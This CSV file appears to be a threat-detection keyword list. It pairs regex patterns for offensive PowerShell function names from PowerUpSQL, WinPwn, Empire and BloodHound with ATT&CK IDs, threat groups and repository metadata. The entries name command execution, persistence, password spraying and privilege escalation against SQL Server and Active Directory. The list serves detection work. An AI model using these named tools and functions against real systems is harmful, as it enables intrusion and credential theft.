"*Invoke-SprayEmptyPassword*",".{0,1000}Invoke\-SprayEmptyPassword.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49688"
"*Invoke-SpraySinglePassword*",".{0,1000}Invoke\-SpraySinglePassword.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","1","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","49689"
"*Invoke-SQLAudit*",".{0,1000}Invoke\-SQLAudit.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Scan for MSSQL misconfigurations to escalate to System Admin","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49690"
"*Invoke-SQLAudit*",".{0,1000}Invoke\-SQLAudit.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49691"
"*Invoke-SQLAuditDefaultLoginPw*",".{0,1000}Invoke\-SQLAuditDefaultLoginPw.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49692"
"*Invoke-SQLAuditPrivAutoExecSp*",".{0,1000}Invoke\-SQLAuditPrivAutoExecSp.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49693"
"*Invoke-SQLAuditPrivCreateProcedure*",".{0,1000}Invoke\-SQLAuditPrivCreateProcedure.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49694"
"*Invoke-SQLAuditPrivDbChaining*",".{0,1000}Invoke\-SQLAuditPrivDbChaining.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49695"
"*Invoke-SQLAuditPrivImpersonateLogin*",".{0,1000}Invoke\-SQLAuditPrivImpersonateLogin.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49696"
"*Invoke-SQLAuditPrivServerLink*",".{0,1000}Invoke\-SQLAuditPrivServerLink.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49697"
"*Invoke-SQLAuditPrivTrustworthy*",".{0,1000}Invoke\-SQLAuditPrivTrustworthy.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49698"
"*Invoke-SQLAuditPrivXpDirtree*",".{0,1000}Invoke\-SQLAuditPrivXpDirtree.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49699"
"*Invoke-SQLAuditPrivXpFileexit*",".{0,1000}Invoke\-SQLAuditPrivXpFileexit.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49700"
"*Invoke-SQLAuditSQLiSpExecuteAs*",".{0,1000}Invoke\-SQLAuditSQLiSpExecuteAs.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49701"
"*Invoke-SQLAuditSQLiSpSigned*",".{0,1000}Invoke\-SQLAuditSQLiSpSigned.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49702"
"*Invoke-SQLAuditWeakLoginPw*",".{0,1000}Invoke\-SQLAuditWeakLoginPw.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49703"
"*Invoke-SQLC2Command*",".{0,1000}Invoke\-SQLC2Command.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49704"
"*Invoke-SQLDumpInfo*",".{0,1000}Invoke\-SQLDumpInfo.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49705"
"*Invoke-SQLDumpInfo*",".{0,1000}Invoke\-SQLDumpInfo.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49706"
"*Invoke-SQLEscalatePriv*",".{0,1000}Invoke\-SQLEscalatePriv.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49707"
"*Invoke-SQLImpersonateService*",".{0,1000}Invoke\-SQLImpersonateService.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49708"
"*Invoke-SQLImpersonateServiceCmd*",".{0,1000}Invoke\-SQLImpersonateServiceCmd.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49709"
"*Invoke-SQLOSCmd -Instance * -Command *",".{0,1000}Invoke\-SQLOSCmd\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Run command (enables XP_CMDSHELL automatically if required)","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49710"
"*Invoke-SQLOSCMD*",".{0,1000}Invoke\-SQLOSCMD.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49711"
"*Invoke-SQLOSCmd*",".{0,1000}Invoke\-SQLOSCmd.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49712"
"*Invoke-SQLOSCmd.ps1*",".{0,1000}Invoke\-SQLOSCmd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SQLOSCmd.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49713"
"*Invoke-SQLOSCmdAgentJob -Verbose -SubSystem *",".{0,1000}Invoke\-SQLOSCmdAgentJob\s\-Verbose\s\-SubSystem\s.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","49714"
"*Invoke-SQLOSCmdAgentJob*",".{0,1000}Invoke\-SQLOSCmdAgentJob.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49715"
"*Invoke-SQLOSCmdCLR*",".{0,1000}Invoke\-SQLOSCmdCLR.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49716"
"*Invoke-SQLOSCmdCOle*",".{0,1000}Invoke\-SQLOSCmdCOle.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49717"
"*Invoke-SQLOSCmdPython*",".{0,1000}Invoke\-SQLOSCmdPython.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49718"
"*Invoke-SQLOSCmdR*",".{0,1000}Invoke\-SQLOSCmdR.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49719"
"*Invoke-SqlServer-Persist-StartupSp*",".{0,1000}Invoke\-SqlServer\-Persist\-StartupSp.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49720"
"*Invoke-SqlServer-Persist-TriggerLogon*",".{0,1000}Invoke\-SqlServer\-Persist\-TriggerLogon.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49721"
"*Invoke-SQLUncPathInjection*",".{0,1000}Invoke\-SQLUncPathInjection.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49722"
"*Invoke-SQLUncPathInjection*",".{0,1000}Invoke\-SQLUncPathInjection.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49723"
"*Invoke-SQLUncPathInjection*",".{0,1000}Invoke\-SQLUncPathInjection.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49724"
